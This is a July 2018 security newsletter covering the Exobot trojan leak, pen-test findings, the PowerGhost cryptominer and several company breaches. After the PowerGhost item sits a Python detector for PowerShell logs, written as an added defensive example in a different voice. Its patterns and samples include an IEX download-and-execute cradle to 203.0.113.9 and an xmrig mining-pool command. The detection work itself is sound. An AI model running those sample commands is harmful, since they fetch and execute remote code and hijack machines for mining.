Inside the Ink

The Week in Breach: 07/23/18 – 07/27/18

This week there were a few troubling breaches that stood out, especially at the identity theft protection company LifeLock. When a company handles information as sensitive as the data LifeLock stores, customer trust is paramount, so a breach really makes one re-evaluate the effectiveness of the organization. A U.S. bank was also breached, with customer accounts drained at hundreds of ATMs across the country: a clear sign of a highly organized and effective attack. Bad actors are becoming smarter and getting better at attacking organizations, and the barrier to entry into this career of crime keeps getting lower.

This Trojan is Galloping

The increasing popularity of ‘malware as a service,’ which is pre-packaged malware developed by authors with technical skill and leased to less advanced cybercriminals, has made it easier for cybercriminals to launch advanced attacks on victims across the globe. A top-shelf malware as a service known as Exobot has had its code leaked after the author of the malware sold the banking trojan’s source code to interested parties. Once the source code is sold to enough people, eventually someone posts it publicly or it leaks in other ways. Authors of these ‘service’ malware families rarely sell off the source code unless they are finished with the project and moving on to other things. This is concerning in multiple ways: first, a new, more powerful malware may be in the works by the same author; second, the sophisticated Android banking trojan is now becoming more available to bad actors. Researchers fear that the availability of the source code on underground hacking forums and its inevitable spread across the web will trigger a surge of malicious Android applications. History supports this conclusion, as the leak of the Android banking trojan ‘BankBot’ on the web lowered the barrier of entry into the world of malware and resulted in an explosion in the use of that trojan.

https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/

The Best Test to Fail

Penetration testers are useful for assessing the strengths and weaknesses of an organization’s cybersecurity, and according to new research these testers are mostly successful. Penetration testers can gain control over the network in question 67% of the time. The study in question was conducted by Rapid7 and examined organizations across industries and sizes, providing an ample sample size from which two main categories of vulnerability emerged: software and credentials. Software flaws have increasingly been used to infiltrate networked resources, and credentials have always been a route of entry for bad actors. Only 16% of the organizations examined did not have a vulnerability, which is less than in last year’s study, where 32% were vulnerability-free.

https://www.darkreading.com/threat-intelligence/new-report-shows-pen-testers-usually-win/d/d-id/1332368

I Ain’t Afraid of No PowerGhost

There is a new cryptocurrency mining malware out in the wild, and instead of using an individual’s devices, this malware has been targeting business PCs and servers. The cryptojacker is fileless, utilizing PowerShell and EternalBlue to spread through a business like a disease. PowerGhost is what researchers have begun calling the malware, and it can start on a single system and then spread to other organizations. As of the writing of This Week in Breach, South America is mainly affected by the cryptojacker, but PowerGhost also has a presence in North America and Europe.

https://www.zdnet.com/article/this-new-cryptomining-malware-targets-business-pcs-and-servers/
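The PowerGhost item above says only that the miner is fileless and moves around with PowerShell, which is exactly the trait a defender can log for. As an added defensive example (not code from this newsletter or from the researchers it cites), the Python below scores PowerShell script-block log records, the decoded script text that Windows writes to event ID 4104 when script block logging is enabled, for traits commonly seen in fileless miners: encoded commands, hidden windows, download-and-execute cradles, mining-pool strings, and remote process creation over WMI. The sample records, host names, indicator patterns and the 203.0.113.9 URL are all constructed for this illustration; none of them are PowerGhost indicators taken from the page.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Indicator rules (assumed, generic fileless-miner traits; not from the article).
# Each rule is (name, compiled regex). Order matters only for the hit list order.
RULES = [
    ("encoded_command", re.compile(r"-(?:enc|encodedcommand)\b", re.IGNORECASE)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)),
    # download cradle: an IEX/Invoke-Expression together with a web download call
    ("download_cradle", re.compile(
        r"(?=.*\b(?:iex|invoke-expression)\b)(?=.*(?:downloadstring|downloadfile|net\.webclient))",
        re.IGNORECASE)),
    ("mining_pool", re.compile(r"stratum\+tcp://|\bxmrig\b", re.IGNORECASE)),
    ("remote_wmi_exec", re.compile(r"invoke-wmimethod.*win32_process.*-computername", re.IGNORECASE)),
]

# "-EncodedCommand" payloads are base64 of UTF-16LE text; capture the base64 run.
ENCODED_RE = re.compile(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Constructed payload for the encoded sample below (built here so the sample
# stays self-consistent). The URL is a documentation address, not a real host.
DECODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/p.ps1')"
ENCODED_PAYLOAD = base64.b64encode(DECODED_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed sample records in the shape of script-block log events (4104).
SAMPLE_EVENTS: List[Dict] = [
    {"host": "ws-101", "event_id": 4104,
     "script": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"host": "ws-102", "event_id": 4104,
     "script": f"powershell -NoP -W Hidden -Enc {ENCODED_PAYLOAD}"},
    {"host": "srv-db1", "event_id": 4104,
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/m.ps1')"},
    {"host": "srv-app3", "event_id": 4104,
     "script": "Start-Process -NoNewWindow xmrig -ArgumentList '-o stratum+tcp://pool.example:3333'"},
    {"host": "ws-104", "event_id": 4104,
     "script": "Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName srv-file2 "
               "-ArgumentList 'powershell -enc AAAA'"},
]


def decode_encoded_command(script: str) -> Optional[str]:
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None if
    there is none or the payload is not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def score_script(script: str) -> List[str]:
    """Names of rules that fire on the script text, plus rules that fire only on
    the decoded -EncodedCommand payload (prefixed 'decoded:')."""
    hits = [name for name, rx in RULES if rx.search(script)]
    decoded = decode_encoded_command(script)
    if decoded:
        hits += [f"decoded:{name}" for name, rx in RULES
                 if name != "encoded_command" and rx.search(decoded)]
    return hits


def flag_suspicious(events: List[Dict], min_hits: int = 1) -> List[Dict]:
    """Return {host, hits} for every 4104 record with at least min_hits rule hits.
    Raising min_hits trades recall for fewer single-indicator false positives."""
    flagged = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        hits = score_script(ev["script"])
        if len(hits) >= min_hits:
            flagged.append({"host": ev["host"], "hits": hits})
    return flagged


if __name__ == "__main__":
    for f in flag_suspicious(SAMPLE_EVENTS):
        print(f["host"], ", ".join(f["hits"]))
```

Decoding the `-EncodedCommand` payload before matching is the step that matters most: an encoded cradle shows none of the cradle keywords in the raw event, so a matcher that only reads the outer command line sees a hidden window and nothing else. Single-indicator hits (a hidden window alone, a lone `-enc`) are common in legitimate administration, which is why `flag_suspicious` lets you require two or more.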

Level One Robotics: Ontario-based business that provides industrial automation services for automotive suppliers.
Exploit: Unprotected server/supply chain vulnerability.
Risk to Small Business: Extreme: A breach of this magnitude and depth would more than likely end a small business due to the extremely sensitive information that was leaked. Most companies would not choose to do business with an organization that leaked their trade secrets.
Individual Risk: Extreme: Passport photos and driver’s license scans of some employees were leaked, which puts them at extreme risk of identity theft.
Date Occurred/Discovered: July 10, 2018
Date Disclosed: July 23, 2018
Data Compromised:

LifeLock: Identity theft protection company.
Exploit: Lack of website authentication and security.
Risk to Small Business: High: Email addresses were exposed, which allows bad actors to target customers. The exploit also allowed a hacker to unsubscribe from all communication with the company, which could be devastating to small businesses.
Individual Risk: Low: Due diligence when opening phishy emails and being suspicious of unexpected emails will go a long way to combat this breach.
Date Occurred/Discovered: July 2018
Date Disclosed: July 25, 2018
Data Compromised:

The National Bank of Blacksburg: A banking organization located in Virginia.
Exploit: Phishing.
Risk to Small Business: High: The cybercriminals got away with a great deal of money in this hack. Most small businesses would not be able to stay afloat after a hit like the one detailed here.
Individual Risk: Extreme: The money taken was from customer accounts.
Date Occurred/Discovered: May 2016 and January 2017
Date Disclosed: Not disclosed, but discovered when a lawsuit was filed June 28, 2018
Data Compromised:

COSCO: COSCO is an acronym for China Ocean Shipping Company and is a Chinese state-owned shipping services company. It is the 4th largest shipping company in the world.
Exploit: Ransomware.
Risk to Small Business: High: The company’s email is down, forcing employees to use Yahoo mail to communicate with customers as well as internally.
Individual Risk: Low: Customers of the shipping company are not affected due to the continuing operation of the company, but it may be more difficult to coordinate with them.
Date Occurred/Discovered: July 24, 2018
Date Disclosed: July 25, 2018
Data Compromised: A ransomware attack has taken down its American network. The organization is keeping the breach under wraps, for now, so most details are not disclosed.
Customers Impacted: All the organization’s customers are affected by this attack. The difficulty in contacting the company could disrupt its customers’ business.

https://www.bleepingcomputer.com/news/security/ransomware-infection-cripples-shipping-giant-coscos-american-network/

Blue Springs Family Care: Family healthcare provider.
Exploit: Ransomware.
Risk to Small Business: High: Ransomware would be highly disruptive to a business of any size.
Individual Risk: Moderate: There is no indication that any customer’s data was exfiltrated.
Date Occurred/Discovered: May 12, 2018
Date Disclosed: July 26, 2018
Data Compromised: A ransomware attack encrypted the organization’s data. The extent of the attack is not clearly defined.
Customers Impacted: 44,979

https://www.databreaches.net/mo-blue-springs-family-care-notifies-44979-patients-after-ransomware-attack/

A note to your customers: Supply Pain

Supply chain attacks are extremely prevalent and costly, and most organizations are not prepared for them. A recent study found that less than 40% of organizations in the US, UK and Singapore have properly vetted their suppliers in the last year. Two-thirds of organizations have suffered a supply chain breach within the same time frame, and almost three quarters (71%) don’t require the same level of security from their suppliers as they do internally. With the global average cost of a supply chain breach at $1.1 million, do you want to take those odds?

https://www.darkreading.com/attacks-breaches/two-thirds-of-organizations-hit-in-supply-chain-attacks-/d/d-id/1332352